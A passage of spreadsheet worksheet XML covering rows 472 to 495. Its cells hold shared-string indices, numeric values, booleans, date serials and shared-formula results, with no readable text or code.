      <c r="C472" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D472" s="2" t="s">
        <v>2240</v>
      </c>
      <c r="E472" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F472" s="1" t="s">
        <v>2255</v>
      </c>
      <c r="G472" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H472" s="4">
        <v>44205.08472222222</v>
      </c>
      <c r="I472" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J472" s="1" t="s">
        <v>2244</v>
      </c>
      <c r="K472" s="2" t="s">
        <v>2245</v>
      </c>
      <c r="L472" s="1">
        <v>8.0</v>
      </c>
      <c r="M472" s="1">
        <v>8.0</v>
      </c>
      <c r="N472" s="1" t="s">
        <v>2256</v>
      </c>
      <c r="O472" s="1" t="s">
        <v>2246</v>
      </c>
      <c r="P472" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q472" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R472" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S472" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="1">
        <v>6447.0</v>
      </c>
      <c r="B473" s="2" t="s">
        <v>2257</v>
      </c>
      <c r="C473" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D473" s="2" t="s">
        <v>2258</v>
      </c>
      <c r="E473" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F473" s="1" t="s">
        <v>2259</v>
      </c>
      <c r="G473" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H473" s="1" t="s">
        <v>2260</v>
      </c>
      <c r="I473" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J473" s="1" t="s">
        <v>2261</v>
      </c>
      <c r="K473" s="2" t="s">
        <v>2262</v>
      </c>
      <c r="L473" s="1">
        <v>15.0</v>
      </c>
      <c r="M473" s="1">
        <v>18.0</v>
      </c>
      <c r="N473" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O473" s="1" t="s">
        <v>2263</v>
      </c>
      <c r="P473" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q473" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R473" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S473" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="1">
        <v>6481.0</v>
      </c>
      <c r="B474" s="2" t="s">
        <v>2264</v>
      </c>
      <c r="C474" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D474" s="2" t="s">
        <v>2265</v>
      </c>
      <c r="E474" s="2" t="s">
        <v>2095</v>
      </c>
      <c r="F474" s="1" t="s">
        <v>2266</v>
      </c>
      <c r="G474" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H474" s="4">
        <v>43593.9375</v>
      </c>
      <c r="I474" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J474" s="1" t="s">
        <v>2267</v>
      </c>
      <c r="K474" s="2" t="s">
        <v>2268</v>
      </c>
      <c r="L474" s="1">
        <v>2.0</v>
      </c>
      <c r="M474" s="1">
        <v>2.0</v>
      </c>
      <c r="N474" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O474" s="1" t="s">
        <v>2269</v>
      </c>
      <c r="P474" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q474" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R474" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S474" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="1">
        <v>6482.0</v>
      </c>
      <c r="B475" s="2" t="s">
        <v>2270</v>
      </c>
      <c r="C475" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D475" s="2" t="s">
        <v>2265</v>
      </c>
      <c r="E475" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F475" s="1" t="s">
        <v>2271</v>
      </c>
      <c r="G475" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H475" s="4">
        <v>43624.84861111111</v>
      </c>
      <c r="I475" s="1" t="s">
        <v>1582</v>
      </c>
      <c r="J475" s="1" t="s">
        <v>2267</v>
      </c>
      <c r="K475" s="2" t="s">
        <v>2268</v>
      </c>
      <c r="L475" s="1">
        <v>2.0</v>
      </c>
      <c r="M475" s="1">
        <v>2.0</v>
      </c>
      <c r="N475" s="1" t="s">
        <v>2269</v>
      </c>
      <c r="O475" s="1" t="s">
        <v>2269</v>
      </c>
      <c r="P475" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q475" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R475" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S475" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="1">
        <v>6536.0</v>
      </c>
      <c r="B476" s="2" t="s">
        <v>2272</v>
      </c>
      <c r="C476" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D476" s="2" t="s">
        <v>2273</v>
      </c>
      <c r="E476" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F476" s="1" t="s">
        <v>521</v>
      </c>
      <c r="G476" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H476" s="1" t="s">
        <v>2274</v>
      </c>
      <c r="I476" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J476" s="1" t="s">
        <v>2275</v>
      </c>
      <c r="K476" s="2" t="s">
        <v>2276</v>
      </c>
      <c r="L476" s="1">
        <v>5.0</v>
      </c>
      <c r="M476" s="1">
        <v>5.0</v>
      </c>
      <c r="N476" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O476" s="1" t="s">
        <v>2277</v>
      </c>
      <c r="P476" s="1" t="s">
        <v>2278</v>
      </c>
      <c r="Q476" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R476" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S476" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="1">
        <v>6591.0</v>
      </c>
      <c r="B477" s="2" t="s">
        <v>2279</v>
      </c>
      <c r="C477" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D477" s="2" t="s">
        <v>2280</v>
      </c>
      <c r="E477" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F477" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G477" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H477" s="4">
        <v>44442.14236111111</v>
      </c>
      <c r="I477" s="1" t="s">
        <v>2281</v>
      </c>
      <c r="J477" s="1" t="s">
        <v>2282</v>
      </c>
      <c r="K477" s="2" t="s">
        <v>2283</v>
      </c>
      <c r="L477" s="1">
        <v>3.0</v>
      </c>
      <c r="M477" s="1">
        <v>9.0</v>
      </c>
      <c r="N477" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O477" s="1" t="s">
        <v>2284</v>
      </c>
      <c r="P477" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q477" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R477" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S477" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="1">
        <v>6710.0</v>
      </c>
      <c r="B478" s="2" t="s">
        <v>2285</v>
      </c>
      <c r="C478" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D478" s="2" t="s">
        <v>2286</v>
      </c>
      <c r="E478" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F478" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G478" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H478" s="4">
        <v>44716.97638888889</v>
      </c>
      <c r="I478" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J478" s="1" t="s">
        <v>2287</v>
      </c>
      <c r="K478" s="2" t="s">
        <v>2288</v>
      </c>
      <c r="L478" s="1">
        <v>4.0</v>
      </c>
      <c r="M478" s="1">
        <v>7.0</v>
      </c>
      <c r="N478" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O478" s="1" t="s">
        <v>2289</v>
      </c>
      <c r="P478" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q478" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R478" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S478" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="1">
        <v>6711.0</v>
      </c>
      <c r="B479" s="2" t="s">
        <v>2290</v>
      </c>
      <c r="C479" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D479" s="2" t="s">
        <v>2286</v>
      </c>
      <c r="E479" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F479" s="1" t="s">
        <v>2291</v>
      </c>
      <c r="G479" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H479" s="4">
        <v>44746.041666666664</v>
      </c>
      <c r="I479" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J479" s="1" t="s">
        <v>2287</v>
      </c>
      <c r="K479" s="2" t="s">
        <v>2288</v>
      </c>
      <c r="L479" s="1">
        <v>4.0</v>
      </c>
      <c r="M479" s="1">
        <v>7.0</v>
      </c>
      <c r="N479" s="1" t="s">
        <v>822</v>
      </c>
      <c r="O479" s="1" t="s">
        <v>2289</v>
      </c>
      <c r="P479" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q479" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R479" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S479" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="1">
        <v>6712.0</v>
      </c>
      <c r="B480" s="2" t="s">
        <v>2292</v>
      </c>
      <c r="C480" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D480" s="2" t="s">
        <v>2286</v>
      </c>
      <c r="E480" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F480" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G480" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H480" s="4">
        <v>44746.07083333333</v>
      </c>
      <c r="I480" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J480" s="1" t="s">
        <v>2287</v>
      </c>
      <c r="K480" s="2" t="s">
        <v>2288</v>
      </c>
      <c r="L480" s="1">
        <v>4.0</v>
      </c>
      <c r="M480" s="1">
        <v>7.0</v>
      </c>
      <c r="N480" s="1" t="s">
        <v>315</v>
      </c>
      <c r="O480" s="1" t="s">
        <v>2289</v>
      </c>
      <c r="P480" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q480" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R480" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S480" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="1">
        <v>6713.0</v>
      </c>
      <c r="B481" s="2" t="s">
        <v>2293</v>
      </c>
      <c r="C481" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D481" s="2" t="s">
        <v>2286</v>
      </c>
      <c r="E481" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F481" s="1" t="s">
        <v>2294</v>
      </c>
      <c r="G481" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H481" s="4">
        <v>44746.33125</v>
      </c>
      <c r="I481" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J481" s="1" t="s">
        <v>2287</v>
      </c>
      <c r="K481" s="2" t="s">
        <v>2288</v>
      </c>
      <c r="L481" s="1">
        <v>4.0</v>
      </c>
      <c r="M481" s="1">
        <v>7.0</v>
      </c>
      <c r="N481" s="1" t="s">
        <v>2295</v>
      </c>
      <c r="O481" s="1" t="s">
        <v>2289</v>
      </c>
      <c r="P481" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q481" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R481" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S481" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="1">
        <v>6714.0</v>
      </c>
      <c r="B482" s="2" t="s">
        <v>2296</v>
      </c>
      <c r="C482" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D482" s="2" t="s">
        <v>2286</v>
      </c>
      <c r="E482" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F482" s="1" t="s">
        <v>2291</v>
      </c>
      <c r="G482" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H482" s="4">
        <v>44746.98125</v>
      </c>
      <c r="I482" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J482" s="1" t="s">
        <v>2287</v>
      </c>
      <c r="K482" s="2" t="s">
        <v>2288</v>
      </c>
      <c r="L482" s="1">
        <v>4.0</v>
      </c>
      <c r="M482" s="1">
        <v>7.0</v>
      </c>
      <c r="N482" s="1" t="s">
        <v>2297</v>
      </c>
      <c r="O482" s="1" t="s">
        <v>2289</v>
      </c>
      <c r="P482" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q482" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R482" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S482" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="1">
        <v>6715.0</v>
      </c>
      <c r="B483" s="2" t="s">
        <v>2298</v>
      </c>
      <c r="C483" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D483" s="2" t="s">
        <v>2286</v>
      </c>
      <c r="E483" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F483" s="1" t="s">
        <v>2294</v>
      </c>
      <c r="G483" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H483" s="4">
        <v>44777.02361111111</v>
      </c>
      <c r="I483" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J483" s="1" t="s">
        <v>2287</v>
      </c>
      <c r="K483" s="2" t="s">
        <v>2288</v>
      </c>
      <c r="L483" s="1">
        <v>4.0</v>
      </c>
      <c r="M483" s="1">
        <v>7.0</v>
      </c>
      <c r="N483" s="1" t="s">
        <v>949</v>
      </c>
      <c r="O483" s="1" t="s">
        <v>2289</v>
      </c>
      <c r="P483" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q483" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R483" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S483" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="1">
        <v>6789.0</v>
      </c>
      <c r="B484" s="2" t="s">
        <v>2299</v>
      </c>
      <c r="C484" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D484" s="2" t="s">
        <v>2300</v>
      </c>
      <c r="E484" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F484" s="1" t="s">
        <v>2182</v>
      </c>
      <c r="G484" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H484" s="4">
        <v>44866.18680555555</v>
      </c>
      <c r="I484" s="1" t="s">
        <v>2301</v>
      </c>
      <c r="J484" s="1" t="s">
        <v>2302</v>
      </c>
      <c r="K484" s="2" t="s">
        <v>2303</v>
      </c>
      <c r="L484" s="1">
        <v>10.0</v>
      </c>
      <c r="M484" s="1">
        <v>20.0</v>
      </c>
      <c r="N484" s="1" t="s">
        <v>2304</v>
      </c>
      <c r="O484" s="1" t="s">
        <v>2305</v>
      </c>
      <c r="P484" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q484" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R484" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S484" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="1">
        <v>6792.0</v>
      </c>
      <c r="B485" s="2" t="s">
        <v>2306</v>
      </c>
      <c r="C485" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D485" s="2" t="s">
        <v>2300</v>
      </c>
      <c r="E485" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F485" s="1" t="s">
        <v>2307</v>
      </c>
      <c r="G485" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H485" s="1" t="s">
        <v>2308</v>
      </c>
      <c r="I485" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J485" s="1" t="s">
        <v>2309</v>
      </c>
      <c r="K485" s="2" t="s">
        <v>2303</v>
      </c>
      <c r="L485" s="1">
        <v>12.0</v>
      </c>
      <c r="M485" s="1">
        <v>31.0</v>
      </c>
      <c r="N485" s="1" t="s">
        <v>2310</v>
      </c>
      <c r="O485" s="1" t="s">
        <v>2311</v>
      </c>
      <c r="P485" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q485" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R485" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S485" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="1">
        <v>6795.0</v>
      </c>
      <c r="B486" s="2" t="s">
        <v>2312</v>
      </c>
      <c r="C486" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D486" s="2" t="s">
        <v>2313</v>
      </c>
      <c r="E486" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F486" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G486" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H486" s="1" t="s">
        <v>2314</v>
      </c>
      <c r="I486" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J486" s="1" t="s">
        <v>2315</v>
      </c>
      <c r="K486" s="2" t="s">
        <v>2316</v>
      </c>
      <c r="L486" s="1">
        <v>1.0</v>
      </c>
      <c r="M486" s="1">
        <v>1.0</v>
      </c>
      <c r="N486" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O486" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P486" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q486" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R486" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S486" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="1">
        <v>6797.0</v>
      </c>
      <c r="B487" s="2" t="s">
        <v>2317</v>
      </c>
      <c r="C487" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D487" s="2" t="s">
        <v>2318</v>
      </c>
      <c r="E487" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F487" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G487" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H487" s="1" t="s">
        <v>2319</v>
      </c>
      <c r="I487" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J487" s="1" t="s">
        <v>2320</v>
      </c>
      <c r="K487" s="2" t="s">
        <v>2321</v>
      </c>
      <c r="L487" s="1">
        <v>2.0</v>
      </c>
      <c r="M487" s="1">
        <v>2.0</v>
      </c>
      <c r="N487" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O487" s="1" t="s">
        <v>2322</v>
      </c>
      <c r="P487" s="1" t="s">
        <v>2323</v>
      </c>
      <c r="Q487" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R487" s="2">
        <f t="shared" si="2"/>
        <v>21</v>
      </c>
      <c r="S487" s="1">
        <f t="shared" si="3"/>
        <v>21</v>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="1">
        <v>6798.0</v>
      </c>
      <c r="B488" s="2" t="s">
        <v>2324</v>
      </c>
      <c r="C488" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D488" s="2" t="s">
        <v>2325</v>
      </c>
      <c r="E488" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F488" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G488" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H488" s="1" t="s">
        <v>2326</v>
      </c>
      <c r="I488" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J488" s="1" t="s">
        <v>2320</v>
      </c>
      <c r="K488" s="2" t="s">
        <v>2321</v>
      </c>
      <c r="L488" s="1">
        <v>2.0</v>
      </c>
      <c r="M488" s="1">
        <v>2.0</v>
      </c>
      <c r="N488" s="1" t="s">
        <v>2322</v>
      </c>
      <c r="O488" s="1" t="s">
        <v>2322</v>
      </c>
      <c r="P488" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q488" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R488" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S488" s="1">
        <f t="shared" si="3"/>
        <v>21</v>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="1">
        <v>6799.0</v>
      </c>
      <c r="B489" s="2" t="s">
        <v>2327</v>
      </c>
      <c r="C489" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D489" s="2" t="s">
        <v>2328</v>
      </c>
      <c r="E489" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F489" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G489" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H489" s="1" t="s">
        <v>2329</v>
      </c>
      <c r="I489" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J489" s="1" t="s">
        <v>2330</v>
      </c>
      <c r="K489" s="2" t="s">
        <v>2331</v>
      </c>
      <c r="L489" s="1">
        <v>2.0</v>
      </c>
      <c r="M489" s="1">
        <v>2.0</v>
      </c>
      <c r="N489" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O489" s="1" t="s">
        <v>2332</v>
      </c>
      <c r="P489" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q489" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R489" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S489" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="1">
        <v>6801.0</v>
      </c>
      <c r="B490" s="2" t="s">
        <v>2333</v>
      </c>
      <c r="C490" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D490" s="2" t="s">
        <v>2334</v>
      </c>
      <c r="E490" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F490" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G490" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H490" s="1" t="s">
        <v>2335</v>
      </c>
      <c r="I490" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J490" s="1" t="s">
        <v>2336</v>
      </c>
      <c r="K490" s="2" t="s">
        <v>2337</v>
      </c>
      <c r="L490" s="1">
        <v>1.0</v>
      </c>
      <c r="M490" s="1">
        <v>1.0</v>
      </c>
      <c r="N490" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O490" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P490" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q490" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R490" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S490" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="1">
        <v>6997.0</v>
      </c>
      <c r="B491" s="2" t="s">
        <v>2338</v>
      </c>
      <c r="C491" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D491" s="2" t="s">
        <v>2339</v>
      </c>
      <c r="E491" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="F491" s="1" t="s">
        <v>747</v>
      </c>
      <c r="G491" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H491" s="4">
        <v>44169.47986111111</v>
      </c>
      <c r="I491" s="1" t="s">
        <v>748</v>
      </c>
      <c r="J491" s="1" t="s">
        <v>2340</v>
      </c>
      <c r="K491" s="2" t="s">
        <v>2341</v>
      </c>
      <c r="L491" s="1">
        <v>1.0</v>
      </c>
      <c r="M491" s="1">
        <v>1.0</v>
      </c>
      <c r="N491" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O491" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P491" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q491" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R491" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S491" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="1">
        <v>7002.0</v>
      </c>
      <c r="B492" s="2" t="s">
        <v>2342</v>
      </c>
      <c r="C492" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D492" s="2" t="s">
        <v>2343</v>
      </c>
      <c r="E492" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F492" s="1" t="s">
        <v>300</v>
      </c>
      <c r="G492" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H492" s="1" t="s">
        <v>2344</v>
      </c>
      <c r="I492" s="1" t="s">
        <v>2345</v>
      </c>
      <c r="J492" s="1" t="s">
        <v>2346</v>
      </c>
      <c r="K492" s="2" t="s">
        <v>2347</v>
      </c>
      <c r="L492" s="1">
        <v>1.0</v>
      </c>
      <c r="M492" s="1">
        <v>1.0</v>
      </c>
      <c r="N492" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O492" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P492" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q492" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R492" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S492" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="1">
        <v>7003.0</v>
      </c>
      <c r="B493" s="2" t="s">
        <v>2348</v>
      </c>
      <c r="C493" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D493" s="2" t="s">
        <v>2343</v>
      </c>
      <c r="E493" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F493" s="1" t="s">
        <v>300</v>
      </c>
      <c r="G493" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H493" s="1" t="s">
        <v>2349</v>
      </c>
      <c r="I493" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J493" s="1" t="s">
        <v>2350</v>
      </c>
      <c r="K493" s="2" t="s">
        <v>2347</v>
      </c>
      <c r="L493" s="1">
        <v>14.0</v>
      </c>
      <c r="M493" s="1">
        <v>22.0</v>
      </c>
      <c r="N493" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O493" s="1" t="s">
        <v>2351</v>
      </c>
      <c r="P493" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q493" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R493" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S493" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="1">
        <v>7066.0</v>
      </c>
      <c r="B494" s="2" t="s">
        <v>2352</v>
      </c>
      <c r="C494" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D494" s="2" t="s">
        <v>2353</v>
      </c>
      <c r="E494" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F494" s="1" t="s">
        <v>2354</v>
      </c>
      <c r="G494" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H494" s="4">
        <v>44874.347916666666</v>
      </c>
      <c r="I494" s="1" t="s">
        <v>1599</v>
      </c>
      <c r="J494" s="1" t="s">
        <v>2355</v>
      </c>
      <c r="K494" s="2" t="s">
        <v>2356</v>
      </c>
      <c r="L494" s="1">
        <v>1.0</v>
      </c>
      <c r="M494" s="1">
        <v>1.0</v>
      </c>
      <c r="N494" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O494" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P494" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q494" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R494" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S494" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="1">
        <v>7092.0</v>
      </c>
      <c r="B495" s="2" t="s">
        <v>2357</v>
      </c>
      <c r="C495" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D495" s="2" t="s">
        <v>2358</v>
      </c>
      <c r="E495" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F495" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G495" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H495" s="1" t="s">
        <v>2359</v>
      </c>
      <c r="I495" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J495" s="1" t="s">
        <v>2360</v>
      </c>
      <c r="K495" s="2" t="s">
        <v>2361</v>
      </c>
      <c r="L495" s="1">
        <v>2.0</v>
      </c>
